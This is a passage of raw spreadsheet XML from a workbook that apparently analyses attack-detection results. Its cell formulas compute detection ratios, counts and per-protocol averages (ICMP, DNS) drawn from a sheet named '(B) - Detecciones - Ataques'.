      </c>
      <c r="J17" s="645">
        <f t="shared" si="17"/>
        <v>0.9435483871</v>
      </c>
      <c r="K17" s="645">
        <f t="shared" si="17"/>
        <v>0.1666666667</v>
      </c>
      <c r="L17" s="738">
        <v>0.0</v>
      </c>
      <c r="M17" s="645">
        <f t="shared" ref="M17:U17" si="18">M11/M10</f>
        <v>0.7142857143</v>
      </c>
      <c r="N17" s="645">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="O17" s="645">
        <f t="shared" si="18"/>
        <v>0.0009441756167</v>
      </c>
      <c r="P17" s="645">
        <f t="shared" si="18"/>
        <v>0.04109589041</v>
      </c>
      <c r="Q17" s="645">
        <f t="shared" si="18"/>
        <v>0.5789473684</v>
      </c>
      <c r="R17" s="645">
        <f t="shared" si="18"/>
        <v>0.7142857143</v>
      </c>
      <c r="S17" s="645">
        <f t="shared" si="18"/>
        <v>0.002498391754</v>
      </c>
      <c r="T17" s="645">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="U17" s="646">
        <f t="shared" si="18"/>
        <v>0.9808362369</v>
      </c>
      <c r="W17" s="647" t="s">
        <v>2671</v>
      </c>
      <c r="X17" s="448">
        <f t="shared" ref="X17:CY17" si="19">IF(X10=0,"-",X11/X10)</f>
        <v>0.06202046036</v>
      </c>
      <c r="Y17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="Z17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="AA17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="AB17" s="448">
        <f t="shared" si="19"/>
        <v>0.9997122716</v>
      </c>
      <c r="AC17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="AD17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="AE17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="AF17" s="448">
        <f t="shared" si="19"/>
        <v>0.9824561404</v>
      </c>
      <c r="AG17" s="448">
        <f t="shared" si="19"/>
        <v>0.75</v>
      </c>
      <c r="AH17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="AI17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="AJ17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="AK17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="AL17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="AM17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="AN17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="AO17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="AP17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="AQ17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="AR17" s="448">
        <f t="shared" si="19"/>
        <v>0.6666666667</v>
      </c>
      <c r="AS17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="AT17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="AU17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="AV17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="AW17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="AX17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="AY17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="AZ17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="BA17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="BB17" s="448">
        <f t="shared" si="19"/>
        <v>0.001215066829</v>
      </c>
      <c r="BC17" s="448">
        <f t="shared" si="19"/>
        <v>0.0007722007722</v>
      </c>
      <c r="BD17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="BE17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="BF17" s="448">
        <f t="shared" si="19"/>
        <v>0.1</v>
      </c>
      <c r="BG17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="BH17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="BI17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="BJ17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="BK17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="BL17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="BM17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="BN17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="BO17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="BP17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="BQ17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="BR17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="BS17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="BT17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="BU17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="BV17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="BW17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="BX17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="BY17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="BZ17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="CA17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="CB17" s="448">
        <f t="shared" si="19"/>
        <v>0.2</v>
      </c>
      <c r="CC17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="CD17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="CE17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="CF17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="CG17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="CH17" s="448">
        <f t="shared" si="19"/>
        <v>0.00253649053</v>
      </c>
      <c r="CI17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="CJ17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="CK17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="CL17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="CM17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="CN17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="CO17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="CP17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="CQ17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="CR17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="CS17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="CT17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="CU17" s="448">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="CV17" s="448" t="str">
        <f t="shared" si="19"/>
        <v>-</v>
      </c>
      <c r="CW17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="CX17" s="448">
        <f t="shared" si="19"/>
        <v>1</v>
      </c>
      <c r="CY17" s="648">
        <f t="shared" si="19"/>
        <v>0.09090909091</v>
      </c>
      <c r="CZ17" s="336"/>
      <c r="DA17" s="336"/>
      <c r="DB17" s="336"/>
      <c r="DC17" s="336"/>
      <c r="DD17" s="649" t="s">
        <v>209</v>
      </c>
      <c r="DE17" s="726">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>19</v>
      </c>
      <c r="DF17" s="719">
        <v>8.0</v>
      </c>
      <c r="DG17" s="337">
        <f t="shared" si="9"/>
        <v>0.4210526316</v>
      </c>
      <c r="DH17" s="719">
        <f t="shared" si="10"/>
        <v>11</v>
      </c>
      <c r="DI17" s="720">
        <f t="shared" si="11"/>
        <v>0.5789473684</v>
      </c>
      <c r="DJ17" s="719">
        <v>5.0</v>
      </c>
      <c r="DK17" s="20"/>
      <c r="DL17" s="20">
        <v>0.0</v>
      </c>
      <c r="DM17" s="20">
        <v>14.0</v>
      </c>
      <c r="DN17" s="336">
        <f t="shared" si="12"/>
        <v>0.7368421053</v>
      </c>
      <c r="DO17" s="336">
        <f t="shared" si="13"/>
        <v>0.2631578947</v>
      </c>
      <c r="DP17" s="721">
        <f t="shared" si="14"/>
        <v>13</v>
      </c>
      <c r="DR17" s="610"/>
      <c r="DS17" s="610"/>
      <c r="DT17" s="619" t="s">
        <v>209</v>
      </c>
      <c r="DU17" s="612">
        <f>DF17/'(D) - Análisis Resultados I - S'!EB36</f>
        <v>0.8888888889</v>
      </c>
      <c r="DV17" s="336"/>
      <c r="DW17" s="619" t="s">
        <v>209</v>
      </c>
      <c r="DX17" s="612">
        <f t="shared" si="15"/>
        <v>0.4210526316</v>
      </c>
      <c r="DY17" s="722">
        <v>0.6666666666666666</v>
      </c>
      <c r="DZ17" s="722"/>
      <c r="EA17" s="722"/>
      <c r="EE17" s="636" t="s">
        <v>633</v>
      </c>
      <c r="EF17" s="69" t="str">
        <f>(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE17  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE17  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG17" s="69" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE17  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE17  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH17" s="336" t="str">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE17  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE17  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE17  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EI17" s="337" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE17  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE17,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE17  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EJ17" s="20"/>
      <c r="EK17" s="20"/>
      <c r="EL17" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP8&lt;&gt;0,'(B) - Detecciones - Ataques'!IP8*'(B) - Detecciones - Ataques'!IL8/('(B) - Detecciones - Ataques'!IL8+'(B) - Detecciones - Ataques'!IN8),0)</f>
        <v>0</v>
      </c>
      <c r="EM17" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP8&lt;&gt;0,'(B) - Detecciones - Ataques'!IP8*'(B) - Detecciones - Ataques'!IN8/('(B) - Detecciones - Ataques'!IL8+'(B) - Detecciones - Ataques'!IN8),0)</f>
        <v>0</v>
      </c>
      <c r="EN17" s="626"/>
      <c r="EO17" s="626"/>
      <c r="EP17" s="729"/>
      <c r="EQ17" s="730"/>
      <c r="ER17" s="731" t="s">
        <v>244</v>
      </c>
      <c r="ES17" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER17)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER17 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="ET17" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER17)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER17 &amp; "*")</f>
        <v>7</v>
      </c>
      <c r="EU17" s="728">
        <f t="shared" si="16"/>
        <v>0.7142857143</v>
      </c>
      <c r="EV17" s="730"/>
      <c r="EW17" s="732"/>
      <c r="EX17" s="730"/>
      <c r="EY17" s="730"/>
      <c r="EZ17" s="20" t="s">
        <v>2670</v>
      </c>
      <c r="FA17" s="336">
        <f>1-FA11</f>
        <v>0.3985055519</v>
      </c>
      <c r="FD17" s="403"/>
      <c r="FE17" s="403"/>
      <c r="FF17" s="403"/>
      <c r="FG17" s="403"/>
      <c r="FH17" s="403"/>
      <c r="FI17" s="403"/>
      <c r="FJ17" s="403"/>
      <c r="FK17" s="403"/>
      <c r="FL17" s="403"/>
      <c r="FM17" s="403"/>
      <c r="FN17" s="403"/>
      <c r="FO17" s="403"/>
      <c r="FP17" s="403"/>
      <c r="FQ17" s="403" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"ICMP")</f>
        <v>ICMP</v>
      </c>
      <c r="FR17" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ17)</f>
        <v>0.5</v>
      </c>
      <c r="FS17" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ17)</f>
        <v>0.5</v>
      </c>
      <c r="FT17" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ17)</f>
        <v>0.5</v>
      </c>
      <c r="FU17" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ17)</f>
        <v>2</v>
      </c>
    </row>
    <row r="18">
      <c r="D18" s="173"/>
      <c r="E18" s="173"/>
      <c r="DD18" s="616" t="s">
        <v>664</v>
      </c>
      <c r="DE18" s="726">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD18,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>22</v>
      </c>
      <c r="DF18" s="719">
        <v>9.0</v>
      </c>
      <c r="DG18" s="337">
        <f t="shared" si="9"/>
        <v>0.4090909091</v>
      </c>
      <c r="DH18" s="719">
        <f t="shared" si="10"/>
        <v>13</v>
      </c>
      <c r="DI18" s="720">
        <f t="shared" si="11"/>
        <v>0.5909090909</v>
      </c>
      <c r="DJ18" s="719">
        <v>1.0</v>
      </c>
      <c r="DK18" s="20"/>
      <c r="DL18" s="20">
        <v>0.0</v>
      </c>
      <c r="DM18" s="20">
        <v>20.0</v>
      </c>
      <c r="DN18" s="336">
        <f t="shared" si="12"/>
        <v>0.9090909091</v>
      </c>
      <c r="DO18" s="336">
        <f t="shared" si="13"/>
        <v>0.09090909091</v>
      </c>
      <c r="DP18" s="721">
        <f t="shared" si="14"/>
        <v>10</v>
      </c>
      <c r="DR18" s="610"/>
      <c r="DS18" s="610"/>
      <c r="DT18" s="619" t="s">
        <v>664</v>
      </c>
      <c r="DU18" s="612">
        <f>DF18/'(D) - Análisis Resultados I - S'!EB37</f>
        <v>1.5</v>
      </c>
      <c r="DW18" s="619" t="s">
        <v>664</v>
      </c>
      <c r="DX18" s="612">
        <f t="shared" si="15"/>
        <v>0.4090909091</v>
      </c>
      <c r="DY18" s="722">
        <v>0.42105263157894735</v>
      </c>
      <c r="DZ18" s="722"/>
      <c r="EA18" s="722"/>
      <c r="EE18" s="636" t="s">
        <v>244</v>
      </c>
      <c r="EF18" s="69" t="str">
        <f>(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE18,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE18  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE18,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE18  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG18" s="69" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE18,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE18  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE18,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE18  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH18" s="336" t="str">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE18,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE18  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE18,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE18  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE18,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE18  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>-</v>
      </c>
      <c r="EI18" s="629" t="s">
        <v>12</v>
      </c>
      <c r="EJ18" s="20"/>
      <c r="EK18" s="20"/>
      <c r="EL18" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP9&lt;&gt;0,'(B) - Detecciones - Ataques'!IP9*'(B) - Detecciones - Ataques'!IL9/('(B) - Detecciones - Ataques'!IL9+'(B) - Detecciones - Ataques'!IN9),0)</f>
        <v>0</v>
      </c>
      <c r="EM18" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP9&lt;&gt;0,'(B) - Detecciones - Ataques'!IP9*'(B) - Detecciones - Ataques'!IN9/('(B) - Detecciones - Ataques'!IL9+'(B) - Detecciones - Ataques'!IN9),0)</f>
        <v>0</v>
      </c>
      <c r="EN18" s="626"/>
      <c r="EO18" s="626"/>
      <c r="EP18" s="739"/>
      <c r="EQ18" s="735"/>
      <c r="ER18" s="740" t="s">
        <v>427</v>
      </c>
      <c r="ES18" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER18)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER18 &amp; "*")</f>
        <v>2</v>
      </c>
      <c r="ET18" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER18)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER18 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="EU18" s="728">
        <f t="shared" si="16"/>
        <v>0.4</v>
      </c>
      <c r="EV18" s="735"/>
      <c r="EW18" s="741"/>
      <c r="EX18" s="735"/>
      <c r="EY18" s="735"/>
      <c r="EZ18" s="20" t="s">
        <v>2672</v>
      </c>
      <c r="FA18" s="336">
        <f>1-FA15</f>
        <v>0.9131556366</v>
      </c>
      <c r="FB18" s="336"/>
      <c r="FC18" s="336"/>
      <c r="FD18" s="336"/>
      <c r="FE18" s="336"/>
      <c r="FF18" s="336"/>
      <c r="FG18" s="336"/>
      <c r="FH18" s="336"/>
      <c r="FI18" s="336"/>
      <c r="FJ18" s="336"/>
      <c r="FK18" s="336"/>
      <c r="FL18" s="336"/>
      <c r="FM18" s="336"/>
      <c r="FN18" s="336"/>
      <c r="FO18" s="336"/>
      <c r="FP18" s="336"/>
      <c r="FQ18" s="336" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DNS")</f>
        <v>DNS</v>
      </c>
      <c r="FR18" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ18)</f>
        <v>0.7494200657</v>
      </c>
      <c r="FS18" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ18)</f>
        <v>0.7493718593</v>
      </c>
      <c r="FT18" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ18)</f>
        <v>0.75</v>
      </c>
      <c r="FU18" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ18)</f>
        <v>4</v>
      </c>
    </row>
    <row r="19">
      <c r="D19" s="288" t="s">
        <v>2550</v>
      </c>
      <c r="E19" s="290"/>
      <c r="DD19" s="616" t="s">
        <v>357</v>
      </c>
      <c r="DE19" s="726">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD19,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>10</v>
      </c>
      <c r="DF19" s="719">
        <v>8.0</v>
      </c>
      <c r="DG19" s="337">
        <f t="shared" si="9"/>
        <v>0.8</v>
      </c>
      <c r="DH19" s="719">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="DI19" s="720">
        <f t="shared" si="11"/>
        <v>0.2</v>
      </c>
      <c r="DJ19" s="726">
        <v>5.0</v>
      </c>
      <c r="DK19" s="20"/>
      <c r="DL19" s="20">
        <v>0.0</v>
      </c>
      <c r="DM19" s="20">
        <v>9.0</v>
      </c>
      <c r="DN19" s="336">
        <f t="shared" si="12"/>
        <v>0.9</v>
      </c>
      <c r="DO19" s="336">
        <f t="shared" si="13"/>
        <v>0.1</v>
      </c>
      <c r="DP19" s="721">
        <f t="shared" si="14"/>
        <v>13</v>
      </c>
      <c r="DR19" s="610"/>
      <c r="DS19" s="610"/>
      <c r="DT19" s="619" t="s">
        <v>357</v>
      </c>
      <c r="DU19" s="612">
        <f>DF19/'(D) - Análisis Resultados I - S'!EB38</f>
        <v>1.6</v>
      </c>
      <c r="DW19" s="619" t="s">
        <v>357</v>
      </c>
      <c r="DX19" s="612">
